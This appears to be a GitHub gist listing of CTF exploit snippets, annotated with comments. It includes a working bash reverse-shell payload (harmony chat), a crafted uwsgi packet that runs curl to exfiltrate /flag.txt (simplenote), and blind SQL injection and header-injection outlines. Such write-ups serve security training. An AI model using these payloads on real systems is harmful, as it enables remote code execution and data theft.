shpik-kr / harekaze_note.py
Last active May 19, 2019 06:51
HarekazeCTF 2019 Harekaze_Note
# HarekazeCTF 2019 "Harekaze Note" pwn scaffold.  Only the setup is visible
# in this preview; the exploit body follows it in the full gist.
from pwn import *
# Local run by default; the commented-out remote() line targets the challenge
# server.  Toggle log_level to 'debug' to see every byte sent/received.
r = process('./note')
#r = remote('problem.harekaze.com',20003)
#context.log_level = 'debug'
e = ELF('./note')
# libc as pwntools resolves it for the *local* binary -- offsets taken from
# it will not match the remote target unless the same libc is provided.
l = e.libc
# Send helpers.  The str() coercion is Python 2 style; Python 3 pwntools
# expects bytes (b'...') on the wire.
s = lambda x:r.send(str(x))
sl = lambda x:r.sendline(str(x))
shpik-kr / exp.py
Created September 15, 2019 01:27
babysql writeup
# babysql writeup scaffold: blind SQL injection through the `limit` query
# parameter of /search.  The extraction loop below this preview (range(1,33))
# presumably recovers a 32-character value one position at a time into `pw`.
import requests
import urllib
import json
# Python 2 only: urllib.quote became urllib.parse.quote in Python 3.
# The injected SQL fragment is URL-encoded and placed directly in `limit`.
url = lambda x:"http://mashiro.kr:13000/search?limit=%s"%urllib.quote(x)
cnt = 0  # counter -- purpose not visible in this preview
pw = ''  # accumulates the extracted characters
for i in range(1,33):
tmp = 0
shpik-kr / csp.py
Last active February 10, 2020 03:39
Codegate 2020 Quals Web Exploit code
'''
Codegate 2020 Quals web exploit.  Two bugs are chained (the chain itself is
below this preview):

1. Hash length extension (hashpumpy): forge a valid MAC for an extended
   message without knowing the secret; the author's note says this is used
   to "make multi query", presumably smuggling extra query content past the
   signature check.
2. Header injection: remove the Content-Security-Policy response header,
   after which the injected XSS payload executes.
'''
import hashpumpy
import requests
# Python 2 only: str.encode('base64') no longer exists in Python 3 (use
# base64.b64encode).  The replace() strips the newlines the py2 codec inserts
# every 76 output characters.
b64e = lambda x:x.encode('base64').replace('\n','')
shpik-kr / plane_market.py
Created March 3, 2020 17:08
Aero CTF 2020 Pwn
# Aero CTF 2020 "plane_market" pwn scaffold; the exploit body follows this
# preview in the full gist.
from pwn import *
# Remote target by default; uncomment process() to test against a local copy.
#r = process('./plane_market')
r = remote('tasks.aeroctf.com', 33087)
# Prompt-sync helpers: consume output up to the menu delimiters ':' and '>'.
c0 = lambda:r.recvuntil(':')
c1 = lambda:r.recvuntil('>')
# Send helpers.  str() coercion is Python 2 style; Python 3 pwntools expects bytes.
s = lambda x:r.send(str(x))
sl = lambda x:r.sendline(str(x))
shpik-kr / exp.py
Last active June 8, 2020 02:06
Defenit CTF 2020 - Tar Analyzer
#!/usr/bin/python
import requests
import os
import threading
import yaml
import subprocess
'''
Vulnerabilities:
1. Directory Traversal + File upload: the user can write outside the upload folder because `tarfile`'s `extractall()` does not sanitize member paths, so an archive entry named `../...` escapes the extraction directory (Python 3.12+ adds a `filter=` argument that rejects such members).
shpik-kr / README.md
Created July 12, 2020 08:05
beginner_web

Chaining these two queries in order gets you the flag.

Query1: input=FLAG_[YOUR_SESSIONID]&converter=__defineSetter__
Query2: input=FLAG_[YOUR_SESSIONID]&converter=__lookupSetter__

FLAG: TSGCTF{Goo00o0o000o000ood_job!_you_are_rEADy_7o_do_m0re_Web}

shpik-kr / beginners-capsule
Last active October 12, 2020 14:00
SECCON 2020 - Web
// SECCON 2020 "beginners-capsule": a patched copy of the helper TypeScript
// emits for writes to `#private` fields.  The body appears to be the stock
// helper except for the added console.log, which reads the entry the
// private-field map holds for the global `flag` object (defined elsewhere in
// the challenge, not in this snippet) and prints it -- leaking the private
// field the moment any instance's private field is assigned.
var __classPrivateFieldSet = function(receiver, privateMap, value) {
    if (!privateMap.has(receiver)) {
        throw new TypeError(
            "attempted to set private field on non-instance"
        );
    }
    privateMap.set(receiver, value);
    // `flag` must resolve in the surrounding scope; otherwise this throws.
    console.log(privateMap.get(flag));
    return value;
};
shpik-kr / harmony_chat.py
Created November 23, 2020 14:51
DragonCTF 2020 - Web
# DragonCTF 2020 "harmony chat" exploit scaffold.  The registration and
# websocket code follows this preview in the full gist.
import websockets
import asyncio
import json
import socket
host = "ws://harmony-1.hackable.software:3380/chat"
# The payload is shaped like a CSP violation report (document-uri, referrer,
# violated-directive, blocked-uri, ...).  `script-sample`, normally a string,
# is an object whose toString carries "___js-to-json-class___": "Function";
# presumably the receiving side revives objects tagged that way into live
# Functions, so stringifying the sample executes the body: child_process
# execSync spawning a bash reverse shell.  Replace <host>/<port> with a
# listener before use.
payload = '{"script-sample":{"toString":{"___js-to-json-class___":"Function","json":"console.log(global.process.mainModule.require(`child_process`).execSync(`bash -c \'bash -i >& /dev/tcp/<host>/<port> 0>&1\'`))"}},"document-uri":"a","referrer":"b","violated-directive":"c","effective-directive":"d","original-policy":"e","disposition":"f","blocked-uri":"g","line-number":1,"source-file":"1","status-code":"a"}}'
def register(username):
shpik-kr / pbctf2020_simplenote.py
Created December 7, 2020 00:59
pbctf2020 simplenote
# pbctf 2020 "simplenote": the POST body is a hand-built uwsgi protocol
# packet, not form data.  Layout (16-bit little-endian lengths):
#   \x00          modifier1
#   \xdc\x00      datasize = 0xdc = 220, the byte length of the key/value
#                 section that follows
#   \x00          modifier2
#   then repeated len(key) key len(value) value, e.g.
#   \x0f\x00SERVER_PROTOCOL \x08\x00HTTP/1.1
# The key that matters is UWSGI_FILE = "exec://curl ... --data "`cat /flag.txt`"":
# uwsgi treats an exec:// value as a command to run, so the flag is POSTed
# to [YOUR_URL].  HTTP_HOST is app:4444, which suggests the public front end
# forwards the raw body to the app's uwsgi listener -- that hop is outside
# this snippet.
import requests
url = "http://simplenote.chal.perfect.blue/"
data = '\x00\xdc\x00\x00\x0f\x00SERVER_PROTOCOL\x08\x00HTTP/1.1\x0e\x00REQUEST_METHOD\x03\x00GET\t\x00PATH_INFO\x01\x00/\x0b\x00REQUEST_URI\x01\x00/\x0c\x00QUERY_STRING\x00\x00\x0b\x00SERVER_NAME\x00\x00\t\x00HTTP_HOST\x08\x00app:4444\n\x00UWSGI_FILE<\x00exec://curl http://[YOUR_URL]:10101 --data "`cat /flag.txt`"\x0b\x00SCRIPT_NAME\x01\x00a'
# Sent as a str body; every character here is below 0x80, so the bytes on
# the wire match the packet above regardless of the default text encoding.
r = requests.post(url, data = data)